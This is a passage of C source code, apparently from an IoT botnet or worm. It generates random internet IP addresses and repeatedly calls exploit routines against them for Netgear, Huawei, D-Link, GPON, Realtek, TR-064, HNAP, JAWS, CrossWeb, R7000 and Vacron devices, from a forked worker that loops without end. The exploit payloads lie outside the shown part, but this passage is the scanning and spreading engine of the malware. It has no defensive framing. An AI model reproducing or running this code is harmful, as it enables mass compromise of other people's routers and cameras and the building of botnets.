434 | srand(time(NULL)); | |
435 | ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233; | |
436 | ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255; | |
437 | ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255; | |
438 | ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255; | |
439 | ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233; | |
440 | ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255; | |
441 | ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255; | |
442 | ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255; | |
443 | ||
444 | sprintf(netgear_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(netgear_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]); | |
445 | sprintf(netgear_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(netgear_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]); | |
446 | sprintf(netgear_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(netgear_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]); | |
447 | sprintf(netgear_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(netgear_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]); | |
448 | sprintf(netgear_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(netgear_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]); | |
449 | ||
450 | exploit_socket_netgear(netgear_ip1);exploit_socket_netgear(netgear_ip2);exploit_socket_netgear(netgear_ip3);exploit_socket_netgear(netgear_ip4);exploit_socket_netgear(netgear_ip5); | |
451 | exploit_socket_netgear(netgear_ip6);exploit_socket_netgear(netgear_ip7);exploit_socket_netgear(netgear_ip8);exploit_socket_netgear(netgear_ip9);exploit_socket_netgear(netgear_ip10); | |
452 | } | |
453 | ||
454 | void HUAWEI_IPGen() | |
455 | { | |
456 | char huawei_ip1[16] = {0};char huawei_ip2[16] = {0};char huawei_ip3[16] = {0};char huawei_ip4[16] = {0};char huawei_ip5[16] = {0}; | |
457 | ||
458 | srand(time(NULL)); | |
459 | ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233; | |
460 | ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255; | |
461 | ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255; | |
462 | ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255; | |
463 | ||
464 | sprintf(huawei_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(huawei_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]); | |
465 | sprintf(huawei_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(huawei_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]); | |
466 | sprintf(huawei_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]); | |
467 | ||
468 | exploit_socket_huawei(huawei_ip1); | |
469 | exploit_socket_huawei(huawei_ip2); | |
470 | exploit_socket_huawei(huawei_ip3); | |
471 | exploit_socket_huawei(huawei_ip4); | |
472 | exploit_socket_huawei(huawei_ip5); | |
473 | } | |
474 | ||
475 | void TR064_IPGen() | |
476 | { | |
477 | char tr_ip1[16] = {0}; | |
478 | ||
479 | srand(time(NULL)); | |
480 | ipState[0] = rand() % 233;ipState[1] = rand() % 255; | |
481 | ipState[2] = rand() % 255;ipState[3] = rand() % 255; | |
482 | ||
483 | sprintf(tr_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]); | |
484 | ||
485 | exploit_socket_tr064(tr_ip1); | |
486 | } | |
487 | ||
488 | void HNAP_IPGen() | |
489 | { | |
490 | char hnap_ip1[16] = {0}; | |
491 | ||
492 | srand(time(NULL)); | |
493 | ipState[0] = rand() % 233;ipState[1] = rand() % 255; | |
494 | ipState[2] = rand() % 255;ipState[3] = rand() % 255; | |
495 | ||
496 | sprintf(hnap_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]); | |
497 | ||
498 | exploit_socket_hnap(hnap_ip1); | |
499 | } | |
500 | ||
501 | void CROSSWEB_IPGen() | |
502 | { | |
503 | char crossweb_ip1[16] = {0}; | |
504 | ||
505 | srand(time(NULL)); | |
506 | ipState[0] = rand() % 233;ipState[1] = rand() % 255; | |
507 | ipState[2] = rand() % 255;ipState[3] = rand() % 255; | |
508 | ||
509 | sprintf(crossweb_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]); | |
510 | ||
511 | exploit_socket_crossweb(crossweb_ip1); | |
512 | } | |
513 | ||
514 | void JAWS_IPGen() | |
515 | { | |
516 | char jaws_ip1[16] = {0}; | |
517 | ||
518 | srand(time(NULL)); | |
519 | ipState[0] = rand() % 233;ipState[1] = rand() % 255; | |
520 | ipState[2] = rand() % 255;ipState[3] = rand() % 255; | |
521 | ||
522 | sprintf(jaws_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]); | |
523 | ||
524 | exploit_socket_jaws(jaws_ip1); | |
525 | } | |
526 | ||
527 | void DLINK_IPGen() | |
528 | { | |
529 | char dlink_ip1[16] = {0}; | |
530 | ||
531 | srand(time(NULL)); | |
532 | ipState[0] = rand() % 233;ipState[1] = rand() % 255; | |
533 | ipState[2] = rand() % 255;ipState[3] = rand() % 255; | |
534 | ||
535 | sprintf(dlink_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]); | |
536 | ||
537 | exploit_socket_dlink(dlink_ip1); | |
538 | } | |
539 | ||
540 | void R7000_IPGen() | |
541 | { | |
542 | char r7000_ip1[16] = {0}; | |
543 | ||
544 | srand(time(NULL)); | |
545 | ipState[0] = rand() % 233;ipState[1] = rand() % 255; | |
546 | ipState[2] = rand() % 255;ipState[3] = rand() % 255; | |
547 | ||
548 | sprintf(r7000_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]); | |
549 | ||
550 | exploit_socket_r7064(r7000_ip1); | |
551 | } | |
552 | ||
553 | void VARCON_IPGen() | |
554 | { | |
555 | char varcon_ip1[16] = {0}; | |
556 | ||
557 | srand(time(NULL)); | |
558 | ipState[0] = rand() % 233;ipState[1] = rand() % 255; | |
559 | ipState[2] = rand() % 255;ipState[3] = rand() % 255; | |
560 | ||
561 | sprintf(varcon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]); | |
562 | ||
563 | exploit_socket_vacron(varcon_ip1); | |
564 | } | |
565 | ||
566 | void exploit_worker(void) | |
567 | { | |
568 | int i = 0; | |
569 | exploit_pid = fork(); | |
570 | ||
571 | if (exploit_pid > 0 || exploit_pid == -1) | |
572 | return; | |
573 | restart: | |
574 | i++; | |
575 | if (i > 10) | |
576 | { | |
577 | printf("[Pwn] Sleeping For 12 Seconds\n"); | |
578 | sleep(12); | |
579 | i = i - 10; | |
580 | goto restart; | |
581 | } | |
582 | usleep(300000); | |
583 | GPON8080_IPGen(); | |
584 | usleep(300000); | |
585 | GPON80_IPGen(); | |
586 | usleep(300000); | |
587 | REALTEK_IPGen(); | |
588 | usleep(300000); | |
589 | NETGEAR_IPGen(); | |
590 | usleep(300000); | |
591 | HUAWEI_IPGen(); | |
592 | usleep(300000); | |
593 | TR064_IPGen(); | |
594 | usleep(300000); | |
595 | HNAP_IPGen(); | |
596 | usleep(300000); | |
597 | CROSSWEB_IPGen(); | |
598 | usleep(300000); | |
599 | JAWS_IPGen(); | |
600 | usleep(300000); | |
601 | DLINK_IPGen(); | |
602 | usleep(300000); | |
603 | R7000_IPGen(); | |
604 | usleep(300000); | |
605 | VARCON_IPGen(); | |
606 | goto restart; | |
607 | } | |
608 | ||
609 | void exploit_kill(void) | |
610 | { | |
611 | kill(exploit_pid, 9); | |
612 | } | |
613 | ||
614 | int main(int argc, char const *argv[]) | |
615 | { | |
616 | exploit_worker(); | |
617 | char prev = 0; | |
618 | while(1) | |
619 | { | |
620 | char c = getchar(); | |
621 | if(c == '\n' && prev == c) | |
622 | { | |
623 | // double return pressed! | |
624 | break; | |
625 | } | |
626 | prev = c; | |
627 | } | |
628 | return 0; | |
629 | } |